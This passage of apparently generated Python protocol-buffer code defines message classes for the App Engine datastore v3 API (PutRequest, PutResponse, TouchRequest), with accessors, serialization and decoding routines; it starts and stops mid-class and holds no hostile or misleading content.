      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("Entity%s {\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+"}\n"
      cnt+=1
    cnt=0
    for e in self.deferred_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("deferred%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_in_order_: res+=prefix+("in_order: %s\n" % self.DebugFormatBool(self.in_order_))
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    # Dense tag-indexed tuple; missing tags map to default.
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Wire tag numbers; kEntity* entries belong to the nested Entity group.
  kEntityGroup = 1
  kEntityentity = 2
  kEntitykey = 4
  kEntityversion = 3
  kdeferred = 5
  kin_order = 6

  # Tag -> field-name table for debug formatting; index 0 is reserved.
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "Entity",
    2: "entity",
    3: "version",
    4: "key",
    5: "deferred",
    6: "in_order",
  }, 6)

  # Tag -> wire-type table (tag 1 is a group).
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STARTGROUP,
    2: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.NUMERIC,
    4: ProtocolBuffer.Encoder.STRING,
    5: ProtocolBuffer.Encoder.STRING,
    6: ProtocolBuffer.Encoder.NUMERIC,
  }, 6, ProtocolBuffer.Encoder.MAX_TYPE)


  # Generator boilerplate and fully-qualified descriptor name.
  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.GetResponse'
class PutRequest(ProtocolBuffer.ProtocolMessage):


  CURRENT      =    0
  SEQUENTIAL   =    1

  _AutoIdPolicy_NAMES = {
    0: "CURRENT",
    1: "SEQUENTIAL",
  }

  def AutoIdPolicy_Name(cls, x): return cls._AutoIdPolicy_NAMES.get(x, "")
  AutoIdPolicy_Name = classmethod(AutoIdPolicy_Name)

  has_header_ = 0
  header_ = None
  has_transaction_ = 0
  transaction_ = None
  has_trusted_ = 0
  trusted_ = 0
  has_force_ = 0
  force_ = 0
  has_mark_changes_ = 0
  mark_changes_ = 0
  has_auto_id_policy_ = 0
  auto_id_policy_ = 0

  def __init__(self, contents=None):
    self.entity_ = []
    self.composite_index_ = []
    self.snapshot_ = []
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def header(self):
    if self.header_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.header_ is None: self.header_ = InternalHeader()
      finally:
        self.lazy_init_lock_.release()
    return self.header_

  def mutable_header(self): self.has_header_ = 1; return self.header()

  def clear_header(self):

    if self.has_header_:
      self.has_header_ = 0;
      if self.header_ is not None: self.header_.Clear()

  def has_header(self): return self.has_header_

  def entity_size(self): return len(self.entity_)
  def entity_list(self): return self.entity_

  def entity(self, i):
    return self.entity_[i]

  def mutable_entity(self, i):
    return self.entity_[i]

  def add_entity(self):
    x = EntityProto()
    self.entity_.append(x)
    return x

  def clear_entity(self):
    self.entity_ = []
  def transaction(self):
    if self.transaction_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.transaction_ is None: self.transaction_ = Transaction()
      finally:
        self.lazy_init_lock_.release()
    return self.transaction_

  def mutable_transaction(self): self.has_transaction_ = 1; return self.transaction()

  def clear_transaction(self):

    if self.has_transaction_:
      self.has_transaction_ = 0;
      if self.transaction_ is not None: self.transaction_.Clear()

  def has_transaction(self): return self.has_transaction_

  def composite_index_size(self): return len(self.composite_index_)
  def composite_index_list(self): return self.composite_index_

  def composite_index(self, i):
    return self.composite_index_[i]

  def mutable_composite_index(self, i):
    return self.composite_index_[i]

  def add_composite_index(self):
    x = CompositeIndex()
    self.composite_index_.append(x)
    return x

  def clear_composite_index(self):
    self.composite_index_ = []
  def trusted(self): return self.trusted_

  def set_trusted(self, x):
    self.has_trusted_ = 1
    self.trusted_ = x

  def clear_trusted(self):
    if self.has_trusted_:
      self.has_trusted_ = 0
      self.trusted_ = 0

  def has_trusted(self): return self.has_trusted_

  def force(self): return self.force_

  def set_force(self, x):
    self.has_force_ = 1
    self.force_ = x

  def clear_force(self):
    if self.has_force_:
      self.has_force_ = 0
      self.force_ = 0

  def has_force(self): return self.has_force_

  def mark_changes(self): return self.mark_changes_

  def set_mark_changes(self, x):
    self.has_mark_changes_ = 1
    self.mark_changes_ = x

  def clear_mark_changes(self):
    if self.has_mark_changes_:
      self.has_mark_changes_ = 0
      self.mark_changes_ = 0

  def has_mark_changes(self): return self.has_mark_changes_

  def snapshot_size(self): return len(self.snapshot_)
  def snapshot_list(self): return self.snapshot_

  def snapshot(self, i):
    return self.snapshot_[i]

  def mutable_snapshot(self, i):
    return self.snapshot_[i]

  def add_snapshot(self):
    x = Snapshot()
    self.snapshot_.append(x)
    return x

  def clear_snapshot(self):
    self.snapshot_ = []
  def auto_id_policy(self): return self.auto_id_policy_

  def set_auto_id_policy(self, x):
    self.has_auto_id_policy_ = 1
    self.auto_id_policy_ = x

  def clear_auto_id_policy(self):
    if self.has_auto_id_policy_:
      self.has_auto_id_policy_ = 0
      self.auto_id_policy_ = 0

  def has_auto_id_policy(self): return self.has_auto_id_policy_


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_header()): self.mutable_header().MergeFrom(x.header())
    for i in xrange(x.entity_size()): self.add_entity().CopyFrom(x.entity(i))
    if (x.has_transaction()): self.mutable_transaction().MergeFrom(x.transaction())
    for i in xrange(x.composite_index_size()): self.add_composite_index().CopyFrom(x.composite_index(i))
    if (x.has_trusted()): self.set_trusted(x.trusted())
    if (x.has_force()): self.set_force(x.force())
    if (x.has_mark_changes()): self.set_mark_changes(x.mark_changes())
    for i in xrange(x.snapshot_size()): self.add_snapshot().CopyFrom(x.snapshot(i))
    if (x.has_auto_id_policy()): self.set_auto_id_policy(x.auto_id_policy())

  def Equals(self, x):
    if x is self: return 1
    if self.has_header_ != x.has_header_: return 0
    if self.has_header_ and self.header_ != x.header_: return 0
    if len(self.entity_) != len(x.entity_): return 0
    for e1, e2 in zip(self.entity_, x.entity_):
      if e1 != e2: return 0
    if self.has_transaction_ != x.has_transaction_: return 0
    if self.has_transaction_ and self.transaction_ != x.transaction_: return 0
    if len(self.composite_index_) != len(x.composite_index_): return 0
    for e1, e2 in zip(self.composite_index_, x.composite_index_):
      if e1 != e2: return 0
    if self.has_trusted_ != x.has_trusted_: return 0
    if self.has_trusted_ and self.trusted_ != x.trusted_: return 0
    if self.has_force_ != x.has_force_: return 0
    if self.has_force_ and self.force_ != x.force_: return 0
    if self.has_mark_changes_ != x.has_mark_changes_: return 0
    if self.has_mark_changes_ and self.mark_changes_ != x.mark_changes_: return 0
    if len(self.snapshot_) != len(x.snapshot_): return 0
    for e1, e2 in zip(self.snapshot_, x.snapshot_):
      if e1 != e2: return 0
    if self.has_auto_id_policy_ != x.has_auto_id_policy_: return 0
    if self.has_auto_id_policy_ and self.auto_id_policy_ != x.auto_id_policy_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (self.has_header_ and not self.header_.IsInitialized(debug_strs)): initialized = 0
    for p in self.entity_:
      if not p.IsInitialized(debug_strs): initialized=0
    if (self.has_transaction_ and not self.transaction_.IsInitialized(debug_strs)): initialized = 0
    for p in self.composite_index_:
      if not p.IsInitialized(debug_strs): initialized=0
    for p in self.snapshot_:
      if not p.IsInitialized(debug_strs): initialized=0
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSize())
    n += 1 * len(self.entity_)
    for i in xrange(len(self.entity_)): n += self.lengthString(self.entity_[i].ByteSize())
    if (self.has_transaction_): n += 1 + self.lengthString(self.transaction_.ByteSize())
    n += 1 * len(self.composite_index_)
    for i in xrange(len(self.composite_index_)): n += self.lengthString(self.composite_index_[i].ByteSize())
    if (self.has_trusted_): n += 2
    if (self.has_force_): n += 2
    if (self.has_mark_changes_): n += 2
    n += 1 * len(self.snapshot_)
    for i in xrange(len(self.snapshot_)): n += self.lengthString(self.snapshot_[i].ByteSize())
    if (self.has_auto_id_policy_): n += 1 + self.lengthVarInt64(self.auto_id_policy_)
    return n

  def ByteSizePartial(self):
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSizePartial())
    n += 1 * len(self.entity_)
    for i in xrange(len(self.entity_)): n += self.lengthString(self.entity_[i].ByteSizePartial())
    if (self.has_transaction_): n += 1 + self.lengthString(self.transaction_.ByteSizePartial())
    n += 1 * len(self.composite_index_)
    for i in xrange(len(self.composite_index_)): n += self.lengthString(self.composite_index_[i].ByteSizePartial())
    if (self.has_trusted_): n += 2
    if (self.has_force_): n += 2
    if (self.has_mark_changes_): n += 2
    n += 1 * len(self.snapshot_)
    for i in xrange(len(self.snapshot_)): n += self.lengthString(self.snapshot_[i].ByteSizePartial())
    if (self.has_auto_id_policy_): n += 1 + self.lengthVarInt64(self.auto_id_policy_)
    return n

  def Clear(self):
    self.clear_header()
    self.clear_entity()
    self.clear_transaction()
    self.clear_composite_index()
    self.clear_trusted()
    self.clear_force()
    self.clear_mark_changes()
    self.clear_snapshot()
    self.clear_auto_id_policy()

  def OutputUnchecked(self, out):
    for i in xrange(len(self.entity_)):
      out.putVarInt32(10)
      out.putVarInt32(self.entity_[i].ByteSize())
      self.entity_[i].OutputUnchecked(out)
    if (self.has_transaction_):
      out.putVarInt32(18)
      out.putVarInt32(self.transaction_.ByteSize())
      self.transaction_.OutputUnchecked(out)
    for i in xrange(len(self.composite_index_)):
      out.putVarInt32(26)
      out.putVarInt32(self.composite_index_[i].ByteSize())
      self.composite_index_[i].OutputUnchecked(out)
    if (self.has_trusted_):
      out.putVarInt32(32)
      out.putBoolean(self.trusted_)
    if (self.has_force_):
      out.putVarInt32(56)
      out.putBoolean(self.force_)
    if (self.has_mark_changes_):
      out.putVarInt32(64)
      out.putBoolean(self.mark_changes_)
    for i in xrange(len(self.snapshot_)):
      out.putVarInt32(74)
      out.putVarInt32(self.snapshot_[i].ByteSize())
      self.snapshot_[i].OutputUnchecked(out)
    if (self.has_auto_id_policy_):
      out.putVarInt32(80)
      out.putVarInt32(self.auto_id_policy_)
    if (self.has_header_):
      out.putVarInt32(90)
      out.putVarInt32(self.header_.ByteSize())
      self.header_.OutputUnchecked(out)

  def OutputPartial(self, out):
    for i in xrange(len(self.entity_)):
      out.putVarInt32(10)
      out.putVarInt32(self.entity_[i].ByteSizePartial())
      self.entity_[i].OutputPartial(out)
    if (self.has_transaction_):
      out.putVarInt32(18)
      out.putVarInt32(self.transaction_.ByteSizePartial())
      self.transaction_.OutputPartial(out)
    for i in xrange(len(self.composite_index_)):
      out.putVarInt32(26)
      out.putVarInt32(self.composite_index_[i].ByteSizePartial())
      self.composite_index_[i].OutputPartial(out)
    if (self.has_trusted_):
      out.putVarInt32(32)
      out.putBoolean(self.trusted_)
    if (self.has_force_):
      out.putVarInt32(56)
      out.putBoolean(self.force_)
    if (self.has_mark_changes_):
      out.putVarInt32(64)
      out.putBoolean(self.mark_changes_)
    for i in xrange(len(self.snapshot_)):
      out.putVarInt32(74)
      out.putVarInt32(self.snapshot_[i].ByteSizePartial())
      self.snapshot_[i].OutputPartial(out)
    if (self.has_auto_id_policy_):
      out.putVarInt32(80)
      out.putVarInt32(self.auto_id_policy_)
    if (self.has_header_):
      out.putVarInt32(90)
      out.putVarInt32(self.header_.ByteSizePartial())
      self.header_.OutputPartial(out)

  def TryMerge(self, d):
    """Decode fields from decoder `d` and merge them into this PutRequest.

    Length-delimited fields (tags 10, 18, 26, 74, 90) are decoded via a
    bounded sub-decoder over the next `length` bytes; scalar fields are
    read directly.  Unknown tags are skipped with skipData(); a tag of 0
    is malformed input and raises ProtocolBufferDecodeError.
    """
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_entity().TryMerge(tmp)
        continue
      if tt == 18:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_transaction().TryMerge(tmp)
        continue
      if tt == 26:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_composite_index().TryMerge(tmp)
        continue
      if tt == 32:
        self.set_trusted(d.getBoolean())
        continue
      if tt == 56:
        self.set_force(d.getBoolean())
        continue
      if tt == 64:
        self.set_mark_changes(d.getBoolean())
        continue
      if tt == 74:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_snapshot().TryMerge(tmp)
        continue
      if tt == 80:
        self.set_auto_id_policy(d.getVarInt32())
        continue
      if tt == 90:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_header().TryMerge(tmp)
        continue


      # Tag 0 is never valid; anything else unknown is skipped for
      # forward compatibility.
      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Return a human-readable text rendering of this PutRequest.

    `prefix` is prepended to each line (used for indenting nested
    messages); when `printElemNumber` is true, repeated fields get an
    "(index)" marker after the field name.
    """
    res=""
    if self.has_header_:
      res+=prefix+"header <\n"
      res+=self.header_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.entity_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("entity%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_transaction_:
      res+=prefix+"transaction <\n"
      res+=self.transaction_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.composite_index_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("composite_index%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_trusted_: res+=prefix+("trusted: %s\n" % self.DebugFormatBool(self.trusted_))
    if self.has_force_: res+=prefix+("force: %s\n" % self.DebugFormatBool(self.force_))
    if self.has_mark_changes_: res+=prefix+("mark_changes: %s\n" % self.DebugFormatBool(self.mark_changes_))
    cnt=0
    for e in self.snapshot_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("snapshot%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_auto_id_policy_: res+=prefix+("auto_id_policy: %s\n" % self.DebugFormatInt32(self.auto_id_policy_))
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    """Expand a sparse {tag: value} dict into a dense tuple indexed 0..maxtag.

    Missing tags map to `default`.  Note: deliberately defined without
    `self` — it is only called at class-definition time (to build the
    _TEXT and _TYPES tables below), never on instances.
    """
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Proto field numbers for PutRequest (k<field_name> = tag number).
  kheader = 11
  kentity = 1
  ktransaction = 2
  kcomposite_index = 3
  ktrusted = 4
  kforce = 7
  kmark_changes = 8
  ksnapshot = 9
  kauto_id_policy = 10

  # Dense tag-number -> field-name table; index 0 is the "ErrorCode"
  # sentinel used by the generic ProtocolBuffer machinery.
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "entity",
    2: "transaction",
    3: "composite_index",
    4: "trusted",
    7: "force",
    8: "mark_changes",
    9: "snapshot",
    10: "auto_id_policy",
    11: "header",
  }, 11)

  # Dense tag-number -> wire-type table (unassigned tags get MAX_TYPE).
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.STRING,
    4: ProtocolBuffer.Encoder.NUMERIC,
    7: ProtocolBuffer.Encoder.NUMERIC,
    8: ProtocolBuffer.Encoder.NUMERIC,
    9: ProtocolBuffer.Encoder.STRING,
    10: ProtocolBuffer.Encoder.NUMERIC,
    11: ProtocolBuffer.Encoder.STRING,
  }, 11, ProtocolBuffer.Encoder.MAX_TYPE)


  # Style metadata emitted by the proto compiler (unused here).
  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.PutRequest'
class PutResponse(ProtocolBuffer.ProtocolMessage):
  """Generated message `apphosting_datastore_v3.PutResponse`.

  Fields:
    key     -- repeated Reference, tag 1 (length-delimited).
    cost    -- optional Cost, tag 2 (lazily constructed).
    version -- repeated int64, tag 3 (varint).

  Do not edit by hand: this class is produced by the protocol-buffer
  compiler and its exact statement order is load-bearing.
  """
  # Presence flag and lazily-created value for the optional `cost` field
  # (class-level defaults; per-instance state is set on first use).
  has_cost_ = 0
  cost_ = None

  def __init__(self, contents=None):
    self.key_ = []
    self.version_ = []
    # Guards lazy construction of cost_ across threads.
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def key_size(self): return len(self.key_)
  def key_list(self): return self.key_

  def key(self, i):
    return self.key_[i]

  def mutable_key(self, i):
    return self.key_[i]

  def add_key(self):
    # Append and return a fresh Reference for the caller to fill in.
    x = Reference()
    self.key_.append(x)
    return x

  def clear_key(self):
    self.key_ = []
  def cost(self):
    # Double-checked lazy init under lazy_init_lock_.
    if self.cost_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.cost_ is None: self.cost_ = Cost()
      finally:
        self.lazy_init_lock_.release()
    return self.cost_

  def mutable_cost(self): self.has_cost_ = 1; return self.cost()

  def clear_cost(self):
    # Clears the contents in place (if any) rather than dropping the object.
    if self.has_cost_:
      self.has_cost_ = 0;
      if self.cost_ is not None: self.cost_.Clear()

  def has_cost(self): return self.has_cost_

  def version_size(self): return len(self.version_)
  def version_list(self): return self.version_

  def version(self, i):
    return self.version_[i]

  def set_version(self, i, x):
    self.version_[i] = x

  def add_version(self, x):
    self.version_.append(x)

  def clear_version(self):
    self.version_ = []


  def MergeFrom(self, x):
    """Merge all set fields of another PutResponse `x` into self."""
    assert x is not self
    for i in xrange(x.key_size()): self.add_key().CopyFrom(x.key(i))
    if (x.has_cost()): self.mutable_cost().MergeFrom(x.cost())
    for i in xrange(x.version_size()): self.add_version(x.version(i))

  def Equals(self, x):
    """Field-by-field equality; returns 1/0 (generated-code convention)."""
    if x is self: return 1
    if len(self.key_) != len(x.key_): return 0
    for e1, e2 in zip(self.key_, x.key_):
      if e1 != e2: return 0
    if self.has_cost_ != x.has_cost_: return 0
    if self.has_cost_ and self.cost_ != x.cost_: return 0
    if len(self.version_) != len(x.version_): return 0
    for e1, e2 in zip(self.version_, x.version_):
      if e1 != e2: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    """Return 1 iff all sub-messages are initialized; collects reasons in debug_strs."""
    initialized = 1
    for p in self.key_:
      if not p.IsInitialized(debug_strs): initialized=0
    if (self.has_cost_ and not self.cost_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    """Exact serialized size in bytes (1 byte of tag per field occurrence)."""
    n = 0
    n += 1 * len(self.key_)
    for i in xrange(len(self.key_)): n += self.lengthString(self.key_[i].ByteSize())
    if (self.has_cost_): n += 1 + self.lengthString(self.cost_.ByteSize())
    n += 1 * len(self.version_)
    for i in xrange(len(self.version_)): n += self.lengthVarInt64(self.version_[i])
    return n

  def ByteSizePartial(self):
    """Like ByteSize but sizes sub-messages with their Partial variants."""
    n = 0
    n += 1 * len(self.key_)
    for i in xrange(len(self.key_)): n += self.lengthString(self.key_[i].ByteSizePartial())
    if (self.has_cost_): n += 1 + self.lengthString(self.cost_.ByteSizePartial())
    n += 1 * len(self.version_)
    for i in xrange(len(self.version_)): n += self.lengthVarInt64(self.version_[i])
    return n

  def Clear(self):
    self.clear_key()
    self.clear_cost()
    self.clear_version()

  def OutputUnchecked(self, out):
    """Serialize to `out` without initialization checks (tags 10, 18, 24)."""
    for i in xrange(len(self.key_)):
      out.putVarInt32(10)
      out.putVarInt32(self.key_[i].ByteSize())
      self.key_[i].OutputUnchecked(out)
    if (self.has_cost_):
      out.putVarInt32(18)
      out.putVarInt32(self.cost_.ByteSize())
      self.cost_.OutputUnchecked(out)
    for i in xrange(len(self.version_)):
      out.putVarInt32(24)
      out.putVarInt64(self.version_[i])

  def OutputPartial(self, out):
    """Serialize set fields to `out` using Partial sizes/serializers."""
    for i in xrange(len(self.key_)):
      out.putVarInt32(10)
      out.putVarInt32(self.key_[i].ByteSizePartial())
      self.key_[i].OutputPartial(out)
    if (self.has_cost_):
      out.putVarInt32(18)
      out.putVarInt32(self.cost_.ByteSizePartial())
      self.cost_.OutputPartial(out)
    for i in xrange(len(self.version_)):
      out.putVarInt32(24)
      out.putVarInt64(self.version_[i])

  def TryMerge(self, d):
    """Decode from decoder `d`, merging into self; unknown tags skipped, tag 0 raises."""
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_key().TryMerge(tmp)
        continue
      if tt == 18:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_cost().TryMerge(tmp)
        continue
      if tt == 24:
        self.add_version(d.getVarInt64())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Text rendering; `prefix` indents, `printElemNumber` adds (index) markers."""
    res=""
    cnt=0
    for e in self.key_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("key%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_cost_:
      res+=prefix+"cost <\n"
      res+=self.cost_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.version_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("version%s: %s\n" % (elm, self.DebugFormatInt64(e)))
      cnt+=1
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    # Class-definition-time helper: dense tuple from sparse {tag: value}.
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Proto field numbers.
  kkey = 1
  kcost = 2
  kversion = 3

  # Tag -> field-name table (index 0 is the "ErrorCode" sentinel).
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "key",
    2: "cost",
    3: "version",
  }, 3)

  # Tag -> wire-type table.
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.NUMERIC,
  }, 3, ProtocolBuffer.Encoder.MAX_TYPE)


  # Style metadata emitted by the proto compiler (unused here).
  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.PutResponse'
class TouchRequest(ProtocolBuffer.ProtocolMessage):
  """Generated message `apphosting_datastore_v3.TouchRequest`.

  Fields:
    header          -- optional InternalHeader, tag 10 (lazily constructed).
    key             -- repeated Reference, tag 1.
    composite_index -- repeated CompositeIndex, tag 2.
    force           -- optional bool, tag 3.
    snapshot        -- repeated Snapshot, tag 9.

  Do not edit by hand: this class is produced by the protocol-buffer
  compiler and its exact statement order is load-bearing.
  """
  # Class-level presence flags / defaults for the optional fields.
  has_header_ = 0
  header_ = None
  has_force_ = 0
  force_ = 0

  def __init__(self, contents=None):
    self.key_ = []
    self.composite_index_ = []
    self.snapshot_ = []
    # Guards lazy construction of header_ across threads.
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def header(self):
    # Double-checked lazy init under lazy_init_lock_.
    if self.header_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.header_ is None: self.header_ = InternalHeader()
      finally:
        self.lazy_init_lock_.release()
    return self.header_

  def mutable_header(self): self.has_header_ = 1; return self.header()

  def clear_header(self):
    # Clears the contents in place (if any) rather than dropping the object.
    if self.has_header_:
      self.has_header_ = 0;
      if self.header_ is not None: self.header_.Clear()

  def has_header(self): return self.has_header_

  def key_size(self): return len(self.key_)
  def key_list(self): return self.key_

  def key(self, i):
    return self.key_[i]

  def mutable_key(self, i):
    return self.key_[i]

  def add_key(self):
    # Append and return a fresh Reference for the caller to fill in.
    x = Reference()
    self.key_.append(x)
    return x

  def clear_key(self):
    self.key_ = []
  def composite_index_size(self): return len(self.composite_index_)
  def composite_index_list(self): return self.composite_index_

  def composite_index(self, i):
    return self.composite_index_[i]

  def mutable_composite_index(self, i):
    return self.composite_index_[i]

  def add_composite_index(self):
    x = CompositeIndex()
    self.composite_index_.append(x)
    return x

  def clear_composite_index(self):
    self.composite_index_ = []
  def force(self): return self.force_

  def set_force(self, x):
    self.has_force_ = 1
    self.force_ = x

  def clear_force(self):
    if self.has_force_:
      self.has_force_ = 0
      self.force_ = 0

  def has_force(self): return self.has_force_

  def snapshot_size(self): return len(self.snapshot_)
  def snapshot_list(self): return self.snapshot_

  def snapshot(self, i):
    return self.snapshot_[i]

  def mutable_snapshot(self, i):
    return self.snapshot_[i]

  def add_snapshot(self):
    x = Snapshot()
    self.snapshot_.append(x)
    return x

  def clear_snapshot(self):
    self.snapshot_ = []

  def MergeFrom(self, x):
    """Merge all set fields of another TouchRequest `x` into self."""
    assert x is not self
    if (x.has_header()): self.mutable_header().MergeFrom(x.header())
    for i in xrange(x.key_size()): self.add_key().CopyFrom(x.key(i))
    for i in xrange(x.composite_index_size()): self.add_composite_index().CopyFrom(x.composite_index(i))
    if (x.has_force()): self.set_force(x.force())
    for i in xrange(x.snapshot_size()): self.add_snapshot().CopyFrom(x.snapshot(i))

  def Equals(self, x):
    """Field-by-field equality; returns 1/0 (generated-code convention)."""
    if x is self: return 1
    if self.has_header_ != x.has_header_: return 0
    if self.has_header_ and self.header_ != x.header_: return 0
    if len(self.key_) != len(x.key_): return 0
    for e1, e2 in zip(self.key_, x.key_):
      if e1 != e2: return 0
    if len(self.composite_index_) != len(x.composite_index_): return 0
    for e1, e2 in zip(self.composite_index_, x.composite_index_):
      if e1 != e2: return 0
    if self.has_force_ != x.has_force_: return 0
    if self.has_force_ and self.force_ != x.force_: return 0
    if len(self.snapshot_) != len(x.snapshot_): return 0
    for e1, e2 in zip(self.snapshot_, x.snapshot_):
      if e1 != e2: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    """Return 1 iff all sub-messages are initialized; collects reasons in debug_strs."""
    initialized = 1
    if (self.has_header_ and not self.header_.IsInitialized(debug_strs)): initialized = 0
    for p in self.key_:
      if not p.IsInitialized(debug_strs): initialized=0
    for p in self.composite_index_:
      if not p.IsInitialized(debug_strs): initialized=0
    for p in self.snapshot_:
      if not p.IsInitialized(debug_strs): initialized=0
    return initialized

  def ByteSize(self):
    """Exact serialized size in bytes (bool fields cost 2: 1 tag + 1 value)."""
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSize())
    n += 1 * len(self.key_)
    for i in xrange(len(self.key_)): n += self.lengthString(self.key_[i].ByteSize())
    n += 1 * len(self.composite_index_)
    for i in xrange(len(self.composite_index_)): n += self.lengthString(self.composite_index_[i].ByteSize())
    if (self.has_force_): n += 2
    n += 1 * len(self.snapshot_)
    for i in xrange(len(self.snapshot_)): n += self.lengthString(self.snapshot_[i].ByteSize())
    return n

  def ByteSizePartial(self):
    """Like ByteSize but sizes sub-messages with their Partial variants."""
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSizePartial())
    n += 1 * len(self.key_)
    for i in xrange(len(self.key_)): n += self.lengthString(self.key_[i].ByteSizePartial())
    n += 1 * len(self.composite_index_)
    for i in xrange(len(self.composite_index_)): n += self.lengthString(self.composite_index_[i].ByteSizePartial())
    if (self.has_force_): n += 2
    n += 1 * len(self.snapshot_)
    for i in xrange(len(self.snapshot_)): n += self.lengthString(self.snapshot_[i].ByteSizePartial())
    return n

  def Clear(self):
    self.clear_header()
    self.clear_key()
    self.clear_composite_index()
    self.clear_force()
    self.clear_snapshot()

  def OutputUnchecked(self, out):
    """Serialize to `out` without initialization checks (tags 10, 18, 24, 74, 82)."""
    for i in xrange(len(self.key_)):
      out.putVarInt32(10)
      out.putVarInt32(self.key_[i].ByteSize())
      self.key_[i].OutputUnchecked(out)
    for i in xrange(len(self.composite_index_)):
      out.putVarInt32(18)
      out.putVarInt32(self.composite_index_[i].ByteSize())
      self.composite_index_[i].OutputUnchecked(out)
    if (self.has_force_):
      out.putVarInt32(24)
      out.putBoolean(self.force_)
    for i in xrange(len(self.snapshot_)):
      out.putVarInt32(74)
      out.putVarInt32(self.snapshot_[i].ByteSize())
      self.snapshot_[i].OutputUnchecked(out)
    if (self.has_header_):
      out.putVarInt32(82)
      out.putVarInt32(self.header_.ByteSize())
      self.header_.OutputUnchecked(out)

  def OutputPartial(self, out):
    """Serialize set fields to `out` using Partial sizes/serializers."""
    for i in xrange(len(self.key_)):
      out.putVarInt32(10)
